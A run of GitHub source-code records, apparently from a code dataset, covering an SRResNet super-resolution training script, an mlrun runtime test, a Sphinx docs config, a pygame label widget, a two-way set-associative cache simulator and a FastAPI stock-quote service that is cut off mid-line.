out_channels: number of output channels\n :param kernel_size: kernel size\n :param stride: stride\n :param batch_norm: include a BN layer?\n :param activation: Type of activation; None if none\n '''\n super(ConvolutionalBlock, self).__init__()\n\n if activation is not None:\n activation = activation.lower()\n assert activation in {'prelu', 'leakyrelu', 'tanh'}\n\n # container, that will hold the layers in this convolutional block\n layers = list()\n # convolutional layer\n layers.append(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, \n stride=stride, padding=kernel_size // 2)\n )\n # batch normalization, if wanted\n if batch_norm is True:\n layers.append(nn.BatchNorm2d(num_features=out_channels))\n\n # activation layer, if wanted\n if activation == 'prelu':\n layers.append(nn.PReLU())\n elif activation == 'leakyrelu':\n layers.append(nn.LeakyReLU(0.2))\n elif activation == 'tanh':\n layers.append(nn.Tanh())\n\n # put together the convolutional block as a sequence of the layers\n self.conv_block = nn.Sequential(*layers)\n\n def forward(self, input):\n '''\n Forward propagation\n\n :param input: input images, a tensor of size (N, in_channels, w, h)\n :return: output images, a tensor of size (N, out_channels, w, h)\n '''\n output = self.conv_block(input) #(N, out_channels, w, h)\n return output\n\nclass SubPixelConvolutionalBlock(pl.LightningModule):\n \"\"\"\n A subpixel convolutional block, comprising convolutional, pixel-shuffle, and PReLU activation layers.\n \"\"\"\n def __init__(self, args, scaling_factor=2):#kernel_size=3, n_channels=64, scaling_factor=2):\n \"\"\"\n :param kernel_size: kernel size of the convolution\n :param n_channels: number of input and output channels\n :param scaling_factor: factor to scale input images by (along both dimensions)\n \"\"\"\n super(SubPixelConvolutionalBlock, self).__init__()\n # convolutional layer that increases the number of channels by scaling factor^2, followed by pixel shuffle and PReLU\n self.conv = nn.Conv2d(in_channels=args.n_channels, out_channels=args.n_channels * (scaling_factor ** 2),\n kernel_size=args.small_kernel_size, padding=args.small_kernel_size // 2)\n # These additional channels are shuffled to form additional pixels, upscaling each dimension by the scaling factor\n self.pixel_shuffle = nn.PixelShuffle(upscale_factor=scaling_factor)\n self.prelu = nn.PReLU()\n\n def forward(self, input_):\n \"\"\"\n Forward propagation.\n :param input: input images, a tensor of size (N, n_channels, w, h)\n :return: scaled output images, a tensor of size (N, n_channels, w * scaling factor, h * scaling factor)\n \"\"\"\n output = self.conv(input_) # (N, n_channels * scaling factor^2, w, h)\n output = self.pixel_shuffle(output) # (N, n_channels, w * scaling factor, h * scaling factor)\n output = self.prelu(output) # (N, n_channels, w * scaling factor, h * scaling factor)\n\n return output\n\n\nclass ResidualBlock(pl.LightningModule):\n \"\"\"\n A residual block, comprising two convolutional blocks with a residual connection across them.\n \"\"\"\n def __init__(self, args):\n \"\"\"\n :param kernel_size: kernel size\n :param n_channels: number of input and output channels (same because the input must be added to the output)\n \"\"\"\n super(ResidualBlock, self).__init__()\n\n # first convolutional block\n self.conv_block1 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels, \n kernel_size=args.small_kernel_size, batch_norm=True, activation='PReLu')\n\n # second convolutional block\n self.conv_block2 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels,\n kernel_size=args.small_kernel_size, batch_norm=True, activation=None)\n\n def forward(self, input_):\n \"\"\"\n Forward propagation\n :param input: input images, a tensor of size (N, n_channels, w, h)\n :return: output images, a tensor of size (N, n_channels, w, h)\n \"\"\"\n residual = input_ # (N, n_channels, w, h)\n output = self.conv_block1(input_) # (N, n_channels, w, h)\n output = self.conv_block2(output) # (N, n_channels, w, h)\n output = output + residual # (N, n_channels, w, h)\n\n return output\n \n\nclass SRResNet(pl.LightningModule):\n '''\n The SRResNet, as defined in the paper.\n credits: https://github.com/sgrvinod/a-PyTorch-Tutorial-to-Super-Resolution/blob/master/models.py\n '''\n def __init__(self, args):\n \"\"\"\n :param large_kernel_size: kernel size of the first and last convolutions which transform the inputs and outputs\n :param small_kernel_size: kernel size of all convolutions in-between, i.e. those in the residual and subpixel convolutional blocks\n :param n_channels: number of channels in-between, i.e. the input and output channels for the residual and subpixel convolutional blocks\n :param n_blocks: number of residual blocks\n :param scaling_factor: factor to scale input images by (along both dimensions) in the subpixel convolutional block\n \"\"\"\n super(SRResNet, self).__init__()\n #self.save_hyperparameters(args)\n\n # Scaling factor must be 2, 4 or 8\n scaling_factor = int(args.scaling_factor)\n assert scaling_factor in {2, 4, 8}, \"The scaling factor must be 2, 4, or 8!\"\n\n # First convolutional block\n self.conv_block1 = ConvolutionalBlock(in_channels=3, out_channels=args.n_channels, \n kernel_size=args.large_kernel_size,\n batch_norm=False, activation='PReLu')\n\n # Sequence of residual blocks\n self.residual_blocks = nn.Sequential(\n *[ResidualBlock(args) for i in range(args.n_blocks)]\n )\n\n # Another convolutional block\n self.conv_block2 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels,\n kernel_size=args.small_kernel_size, batch_norm=True, activation=None)\n\n # Upscaling: by sub-pixel convolution, each such block upscaling by a factor of 2\n n_subpixel_convolutional_blocks = int(math.log2(args.scaling_factor))\n print(f'times subpixel: {n_subpixel_convolutional_blocks}')\n self.subpixel_convolutional_blocks = nn.Sequential(\n *[SubPixelConvolutionalBlock(args, scaling_factor=2) for i in range(n_subpixel_convolutional_blocks)]\n )\n\n # Last convolutional block\n self.conv_block3 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=3,\n kernel_size=args.large_kernel_size, batch_norm=False, activation='Tanh')\n\n def forward(self, lr_imgs):\n \"\"\"\n Forward propagation\n\n :param lr_imgs: low-resolution input images, a tensor of size (N, 3, w, h)\n :return: super-resolution output images, a tensor of size (N, 3, w * scaling factor, h * scaling factor)\n \"\"\"\n output = self.conv_block1(lr_imgs) # (N, 3, w, h)\n residual = output # (N, n_channels, w, h)\n output = self.residual_blocks(output) # (N, n_channels, w, h)\n output =self.conv_block2(output) # (N, n_channels, w, h)\n output = output + residual\n output = self.subpixel_convolutional_blocks(output) # (N, 3, w * scaling factor, h * scaling factor)\n sr_imgs = self.conv_block3(output) # (N, 3, w * scaling factor, h * scaling factor)\n return sr_imgs\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=args.learning_rate)\n return optimizer\n\n def mse_loss(self, y_hat, y):\n criterion = nn.MSELoss()\n loss = criterion(y_hat, y)\n return loss\n\n def training_step(self, train_batch, batch_idx):\n x, y = train_batch\n y_hat = self.forward(x)\n loss = self.mse_loss(y_hat, y)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, val_batch, batch_idx):\n x, y = val_batch\n y_hat = self.forward(x)\n loss = self.mse_loss(y_hat, y)\n self.log('val_loss', loss)\n\n def predict_step(self, val_batch, batch_idx):\n x, y = val_batch\n y_pred = self.forward(x)\n loss = self.mse_loss(y_pred, y)\n return y_pred\n \nclass SRCallbacks(Callback):\n def __init__(self, args):\n self.args = args\n\n def on_validation_epoch_end(self, trainer, pl_module):\n metrics = trainer.callback_metrics\n print('\\nValidation epoch end:')\n for key, item in metrics.items():\n print(f'{key}: {item:.4}')\n\n #if self.args.nni:\n # nni.report_intermediate_result(float(metrics['val_loss']))\n\n def on_train_end(self, trainer, pl_module):\n metrics = trainer.callback_metrics\n print(f'\\Final validation loss:')\n for key, item in metrics.items():\n print(f'{key}: {item:.4}')\n #if self.args.nni:\n # nni.report_final_result(float(metrics['val_loss']))\n\ndef add_nni_params(args):\n args_nni = nni.get_next_parameter()\n assert all([key in args for key in args_nni.keys()]), 'need only valid parameters'\n args_dict = vars(args)\n # cast params that should be int to int if needed (nni may offer them as float)\n args_nni_casted = {key:(int(value) if type(args_dict[key]) is int else value)\n for key, value in args_nni.items()}\n args_dict.update(args_nni_casted)\n\n # adjust paths of model and prediction outputs so they get saved together with the other outputs\n nni_output_dir = os.path.expandvars('$NNI_OUTPUT_DIR')\n for param in ['save_model_path', 'output_path']:\n nni_path = os.path.join(nni_output_dir, os.path.basename(args_dict[param]))\n args_dict[param] = nni_path\n return args\n\ndef make_predictions(model, dataloader, args):\n print('make predictions...')\n # undo normalization\n start_time = time.time()\n mean = torch.tensor([0.485, 0.456, 0.406])\n std = torch.tensor([0.229, 0.224, 0.225])\n mean_rev = -(mean/std)\n std_rev = 1/std\n un_transform = transforms.Compose([transforms.Normalize(mean_rev, std_rev)])\n y_pred = []\n for batch in dataloader:\n X, y = batch\n pred = model(X)\n for i in range(X.size()[0]): # range of batch size\n pred[i] = un_transform(pred[i])\n y_pred.append(pred)\n y_pred = torch.concat(y_pred, axis=0).detach()\n if args.accelerator=='gpu':\n y_pred = y_pred.cpu().numpy()\n\n print('predictions finished.')\n print(f'making predictions took: {time.time()-start_time}:.3f')\n print('save predictions ...')\n h5_file = h5py.File(args.output_path, 'w')\n chunk_size = y_pred.shape[0]\n dset = h5_file.create_dataset('y_pred',\n shape=y_pred.shape,\n chunks=(chunk_size,) + y_pred.shape[1:],\n fletcher32=True,\n dtype='float32')\n dset[:] = y_pred\n h5_file.attrs['timestamp'] = str(datetime.datetime.now())\n h5_file.close()\n print(f'saved high resolution images to {args.output_path}')\n\n\nif __name__ == '__main__':\n print(torch.cuda.device_count())\n parser = argparse.ArgumentParser()\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--data-dir', type=str, default='data')\n parser.add_argument('--output-path', type=str, default='data/best_hr_predictions.h5')\n parser.add_argument('--save-model-path', type=str, default='saved_models')\n parser.add_argument('--batch-size', type=int, default=16)\n parser.add_argument('--learning-rate', type=float, default=1e-3)\n parser.add_argument('--scaling-factor', type=int, default=4) # the scaling factor for the generator; the input LR images will be downsampled from the target HR images by this factor\n parser.add_argument('--n-channels', type=int, default=64) # number of channels in-between, i.e. the input and output channels for the residual and subpixel convolutional blocks# number of residual blocks\n parser.add_argument('--large-kernel-size', type=int, default=9) # kernel size of the first and last convolutions which transform the inputs and outputs\n parser.add_argument('--small-kernel-size', type=int, default=3) # kernel size of all convolutions in-between, i.e. those in the residual and subpixel convolutional blocks \n parser.add_argument('--n-blocks', type=int, default=16) # number of residual blocks\n parser.add_argument('--n-epochs', type=int, default=200)\n parser.add_argument('--nni', action='store_true', default=False)\n \n\n #mlflow.pytorch.autolog()\n parser = pl.Trainer.add_argparse_args(parser)\n #parser = SRResNet.add_model_specific_args(parser)\n args = parser.parse_args()\n\n if args.nni:\n args = add_nni_params(args)\n\n for key, value in vars(args).items():\n print(f'{key}: {value}')\n print()\n\n # callbacks\n checkpoint_callback = ModelCheckpoint(monitor=\"val_loss\", dirpath=args.save_model_path, filename='best_model-{epoch}-{val_loss:.2f}')\n early_stop_callback = EarlyStopping(monitor=\"val_loss\", min_delta=0.00, patience=10, verbose=False, mode=\"min\")\n\n model = SRResNet(args)\n data_module = SRDataModule(args)\n data_module.setup(stage='fit')\n train_loader = data_module.train_dataloader()\n valid_loader = data_module.val_dataloader()\n\n tuner_params = nni.get_next_parameter()\n params = vars(merge_parameter(args, tuner_params))\n # get parameters form tuner\n print(nni.get_trial_id())\n\n \n trainer = pl.Trainer.from_argparse_args(args, \n callbacks=[checkpoint_callback, SRCallbacks(args)], \n max_epochs=args.n_epochs)\n \n mlflow.set_experiment(\"hyperparam-search\")\n with mlflow.start_run():\n mlflow.log_params(params)\n mlflow.pytorch.autolog()\n mlflow.set_tag(key=\"NNI experiment\", value=nni.get_experiment_id())\n trainer.fit(model, train_loader, valid_loader)\n\n # make predictions on validation set\n valid_model = SRResNet.load_from_checkpoint(checkpoint_callback.best_model_path, args=args).eval()\n if args.accelerator=='gpu':\n valid_model = valid_model.cuda()\n make_predictions(valid_model, valid_loader, args)\n\n \n","repo_name":"froukje/super-resolution","sub_path":"srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":19114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23573412777","text":"import pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nimport mlrun.errors\nfrom mlrun.runtimes.base import BaseRuntime\nfrom tests.api.runtimes.base import TestRuntimeBase\n\n\nclass TestBaseRunTime(TestRuntimeBase):\n def custom_setup_after_fixtures(self):\n self._mock_create_namespaced_pod()\n\n @pytest.mark.parametrize(\n \"inputs\", [{\"input1\": 123}, {\"input1\": None}, {\"input1\": None, \"input2\": 2}]\n )\n def test_run_with_invalid_inputs(self, db: Session, client: TestClient, inputs):\n runtime = BaseRuntime()\n with pytest.raises(mlrun.errors.MLRunInvalidArgumentTypeError):\n self._execute_run(runtime, inputs=inputs)\n\n def test_run_with_valid_inputs(self, db: Session, client: TestClient):\n inputs = {\"input1\": \"mlrun\"}\n runtime = BaseRuntime()\n self._execute_run(runtime, inputs=inputs)\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"tests/api/runtimes/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4621956591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import date\nimport recommonmark\nfrom recommonmark.transform import AutoStructify\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#\n# needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = ['sphinx.ext.mathjax',\n 'sphinx_copybutton']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\nsource_parsers = {\n '.md': 'recommonmark.parser.CommonMarkParser',\n}\n\n\ndef setup(app):\n app.add_config_value('recommonmark_config', {\n 'enable_eval_rst': True,\n 'enable_auto_doc_ref': True,\n }, True)\n app.add_transform(AutoStructify)\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\nsource_suffix = ['.rst', '.md']\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# Set the default role so we can use `foo` instead of ``foo``\ndefault_role = 'literal'\n\n# General information about the project.\nproject = u'ThebeLab'\ncopyright = u'%i, Min RK' % date.today().year\nauthor = u'Min RK'\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = None\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This patterns also effect to html_static_path and html_extra_path\nexclude_patterns = [\"_build\"]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nimport alabaster_jupyterhub\n\nhtml_theme = 'alabaster_jupyterhub'\nhtml_theme_path = [alabaster_jupyterhub.get_html_theme_path()]\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#\nhtml_theme_options = {\n 'show_related': True,\n 'description': 'Turn static HTML pages into live documents',\n 'github_user': 'minrk',\n 'github_repo': 'thebelab',\n 'github_banner': False,\n 'github_button': False,\n 'show_powered_by': False,\n 'extra_nav_links': {\n 'GitHub Repo': 'http://github.com/minrk/thebelab',\n 'Issue Tracker': 'http://github.com/minrk/thebelab/issues',\n },\n}\n\nhtml_sidebars = {\n '**': [\n 'about.html',\n 'searchbox.html',\n 'navigation.html',\n 'relations.html',\n 'sourcelink.html',\n ],\n}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\", \"../examples\"]\n\n# -- Options for HTMLHelp output ------------------------------------------\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'ThebeLabDoc'\n\n\n# -- Options for LaTeX output ---------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #\n # 'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #\n # 'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #\n # 'preamble': '',\n\n # Latex figure (float) alignment\n #\n # 'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, 'ThebeLabDoc.tex', 'ThebeLab',\n 'Chris Holdgraf', 'manual'),\n]\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n (master_doc, 'ThebeLab', 'ThebeLab',\n [author], 1)\n]\n\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (master_doc, 'ThebeLabDoc', 'ThebeLab',\n author, 'ThebeLabDoc', 'One line description of project.',\n 'Miscellaneous'),\n]\n\n\n# -- Options for Epub output ----------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_title = project\nepub_author = author\nepub_publisher = author\nepub_copyright = copyright\n\n# The unique identifier of the text. This can be a ISBN number\n# or the project homepage.\n#\n# epub_identifier = ''\n\n# A unique identification for the text.\n#\n# epub_uid = ''\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = ['search.html']\n\n# -- Linkcheck options ------------------\nlinkcheck_anchors_ignore = [\"/#!\"]\n","repo_name":"sergeyepimakhov/thebelab","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"5835380660","text":"from Src.Gui.GuiElement import GuiElement\nimport pygame\n\nclass Label(GuiElement):\n\n def __init__(self, position: tuple, size: tuple, text: str, padding: tuple, color: tuple, hoverColor: tuple, fontSize: int, background: tuple, hoverBackground: tuple, center: bool=False):\n super().__init__(position, size)\n self.text = text\n self.padding = padding\n self.color = [color, hoverColor]\n self.fontSize = fontSize\n self.background = [background, hoverBackground]\n self.center = center\n \n def renderFont(self):\n font = pygame.font.SysFont(\"Arial\", self.fontSize)\n render = font.render(self.text, True, self.getColor(), None)\n return render\n\n def getTextPosition(self, fontRender):\n if self.center:\n textX, textY = fontRender.get_size()\n x = self.position[0] + (self.size[0] / 2) - (textX / 2)\n y = self.position[1] + (self.size[1] / 2) - (textY / 2)\n return (x, y)\n x = self.position[0] + self.padding[0]\n y = self.position[1] + self.padding[1]\n return (x, y)\n\n def handleHover(self):\n mousePosition = pygame.mouse.get_pos()\n return (\n self.position[0] < mousePosition[0] + 1 and\n self.position[0] + self.size[0] > mousePosition[0] and\n self.position[1] < mousePosition[1] + 1 and\n self.position[1] + self.size[1] > mousePosition[1]\n )\n\n def getBackground(self):\n if not self.background[1]:\n return self.background[0]\n return self.background[int(self.handleHover())]\n\n def getColor(self):\n if not self.color[1]:\n return self.color[0]\n return self.color[int(self.handleHover())]\n\n def onRender(self, screen):\n fontRender = self.renderFont()\n if self.background[0]:\n pygame.draw.rect(screen, self.getBackground(), (self.position + self.size))\n screen.blit(fontRender, (self.getTextPosition(fontRender) + self.size))","repo_name":"dominikdrozd/Space-Invaders-Python","sub_path":"Src/Gui/Label.py","file_name":"Label.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131335009","text":"def fib(n):\n a, b = 0, 1\n count = 0\n while count < n:\n count += 1\n yield a\n a, b = b, a + b\n\nx = [x**3 for x in fib(5)]\nprint(x)\n","repo_name":"chyld/pythonista","sub_path":"factorial-map.py","file_name":"factorial-map.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22935430861","text":"\"\"\"\nNombre: Funciones de la Memoria Caché.\nAutores: Luis Alberto Salazar y Guido Ernesto Salazar.\nFecha: abril/mayo 2021.\n\"\"\"\n\n# Total de vias = 2\n# Bloques por conjuntos = 32/2 = #16 conjuntos \n# Total de bloques = 32\n# Offset = 3\n# Index = 4\n# Tag = 4/9\n\n# Caché\n\nfrom Funciones_RAM import modificar_ram, traer_datos_ram\nimport random\n\nhits = 0\ntotales = 0\ncache = [\n # Primera vía\n {0: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 1: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 2: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 3: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 4: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 5: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 6: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 7: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 8: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 9: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 10: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 11: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 12: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 13: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 14: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 15: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}},\n # Segundo vía\n {0: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 1: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 2: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 3: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 4: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 5: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 6: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 7: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 8: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n 9: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 10: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 11: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 12: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 13: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 14: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}, \n 15: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}}\n]\n\n# Funciones auxiliares\n\ndef llamarMiss():\n \"\"\"\n Se encarga de calcular el Miss ratio en toda la ejecución del sistema.\n Entradas: \n ninguna.\n Salidas: \n el miss ratio.\n \"\"\"\n global totales, hits\n try:\n total = hits / totales\n except:\n total = 0\n hratio = 1 - total\n return hratio\n\ndef transformacion(numero):\n \"\"\"\n Se encarga de transformar el entero a su representación binaria en 16 bits.\n Ademas de separar los parametros de busqueda para identificar su posición.\n en cache.\n Entradas:\n numero es un numero en decimal que representa una posición en memoria.\n Salidas\n index: es la posición del conjunto\n tag: el identificador del bloque de memoria que se trajo a cache\n offset: la posición en la lista de datos que se quiere modificar.\n \"\"\"\n numero = bin(numero)[2:].zfill(16)\n index = int(numero[16-7:16-3], 2) \n tag = \"0x\" + hex(int(numero[:16-7], 2))[2:].zfill(3)\n offset = int(numero[16-3:], 2)\n return (index, tag, offset)\n\ndef verificarMiss(numero):\n \"\"\"\n Se encarga de verificar si en el conjunto indicado existe un miss o un hit.\n Entradas: \n un número entero.\n Salidas: \n una tupla con el valor de verdad de la verificación, la vía de\n la caché, el indice del conjunto, la etiqueta del conjunto y por\n último el valor en bits del offset.\n \"\"\"\n global cache, hits, totales\n totales += 1\n index, tag, offset = transformacion(numero)\n ver, pos = False, 0\n if cache[0][index][\"validez\"] == 0: pos = 0\n elif cache[0][index][\"validez\"] == 1 and cache[0][index][\"tag\"] == tag: ver, pos = True, 0\n elif cache[1][index][\"validez\"] == 0: pos = 1\n elif cache[1][index][\"validez\"] == 1 and cache[1][index][\"tag\"] == tag: ver, pos = True, 1\n else: pos = random.randrange(1000) % 2\n if ver: hits += 1\n return (ver, pos, index, tag, offset)\n\ndef traer_cache(pos, index, tag):\n \"\"\"\n Se encarga de cambiar los valores en la caché según la posición indicada.\n Entradas:\n la vía de la memoria, el índice en la caché y el tag del bloque.\n Salidas:\n ninguna.\n \"\"\"\n global cache\n if cache[pos][index][\"bit_sucio\"] == 1: modificar_ram(index, cache[pos][index][\"tag\"], cache[pos][index][\"data\"])\n cache[pos][index][\"bit_sucio\"] = 0\n cache[pos][index][\"validez\"] = 1\n cache[pos][index][\"tag\"] = tag\n cache[pos][index][\"data\"] = traer_datos_ram(index, tag)\n\n# Interfaz\n\ndef escribir_cache(numero, dato):\n \"\"\"\n Procedimiento que se encarga de escribir en la cache.\n Entradas:\n numero: Es la posición en memoria que se quiere escribir\n dato: es la información que se quiere guardar en memoria.\n Salidas:\n ninguna.\n \"\"\"\n global cache\n pos, index, offset = general(numero)\n cache[pos][index][\"data\"][offset] = dato\n cache[pos][index][\"bit_sucio\"] = 1\n ver_cache(\"escribir el dato={} en la posicion={}\".format(dato, numero))\n\ndef leer_cache(numero):\n \"\"\"\n Procedimiento que lee un dato de la cache\n Entradas:\n numero: es la posición de memoria que se quiere leer.\n Salidas:\n el dato que hay en la cache.\n \"\"\"\n global cache\n pos, index, offset = general(numero)\n ver_cache(\"Leer la posicion={}\".format(numero))\n return cache[pos][index][\"data\"][offset]\n\ndef general(numero):\n \"\"\"\n Funcion que se encarga de hacer las operaciónes generales sin importar si es\n lectura o escritura.\n Entradas:\n numero: es la posición de memoria con que se va a trabajar.\n Salisas:\n pos: es la via en donde se encuentra el dato.\n index: es el conjunto en donde se encuentra el dato.\n offset: la posición del dato en el bloque.\n \"\"\"\n global cache\n ver, pos, index, tag, offset = verificarMiss(numero)\n if not ver: traer_cache(pos, index, tag)\n return pos, index, offset\n\ndef ver_cache(instruccion):\n \"\"\"\n Procedimiento que permite visualizar los cambios en cache por instrucción.\n Entradas:\n instruccion: es un string que nos dice la información de lo que se ejecuto.\n Salidas:\n Cache.txt: un archivo de texto en donde se mostrara el cambio a lo largo del \n tiempo.\n \"\"\"\n global cache\n f = open(\"Cache.txt\", \"a\")\n f.write(\"----------------------------------------------------------------------------------------------------\\n\")\n f.write(\"En el numero de consulta {} se hizo la instrucción {} y la cache es:\\n\".format(totales, instruccion))\n i = 1\n for via in cache:\n f.write(\"Estos son los datos en la via {}\\n\".format(i))\n for posicion in via:\n f.write(str(posicion) + \" \" + str(via[posicion]) + \"\\n\")\n i += 1\n f.close()","repo_name":"GAOV13/Arquitectura-del-Computador","sub_path":"Memoria cache/Funciones_Cache.py","file_name":"Funciones_Cache.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38523962067","text":"from typing import Union\n\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom bsedata.bse import BSE\n\nfrom datetime import datetime\n\napp = FastAPI()\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"], \n allow_headers=[\"*\"],\n)\n\nbse = BSE(update_codes = True)\n\n\ndef getRightFormat(time_series):\n \"\"\"\n Highcharts.js requires the timeseries data to be in a certain format. A 2x2 array\n with each array containing timestamp in milliseconds and respective value.\n\n time_series = [{'date': 'Fri Dec 30 2022 00:00:00', 'value': 6574.16, 'vol': 20394}]\n \"\"\"\n data = []\n for s in time_series:\n time = s['date']\n time_obj = datetime.strptime(time, \"%a %b %d %Y %H:%M:%S\")\n timestamp = int(time_obj.timestamp()) * 1000\n data.append([timestamp, s['value']])\n return data\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n@app.get(\"/bse/{id}\")\nasync def read_stock(id: int):\n q = str(id)\n if bse.verifyScripCode(q):\n quote = bse.getQuote(q)\n return quote\n else:\n raise HTTPException(status_code=404, detail=\"Please check your BSE scrip code\")\n \n \n@app.get(\"/bse/{id}/time/{period}\")\nasync def read_stock_price_history(id: int, period: str):\n q = str(id)\n p = str(period)\n if p not in ['1M', '3M', '6M', '12M']:\n raise HTTPException(status_code=404, detail=\"The permitted time periods are 1M, 3M, 6M & 12M\")\n if not bse.verifyScripCode(q):\n raise HTTPException(status_code=404, detail=\"Please check your BSE scrip code\")\n \n price_history = bse.getPeriodTrend(q, p)\n price_history_milliseconds_format = getRightFormat(price_history)\n return price_history_milliseconds_format\n \n\n@app.get(\"/bse/list/{performers}\")\nasync def read_bse_performers(performers: str):\n if performers == \"topGainers\":\n return bse.topGainers()\n elif performers == \"topLosers\":\n return bse.topLosers()\n else:\n raise 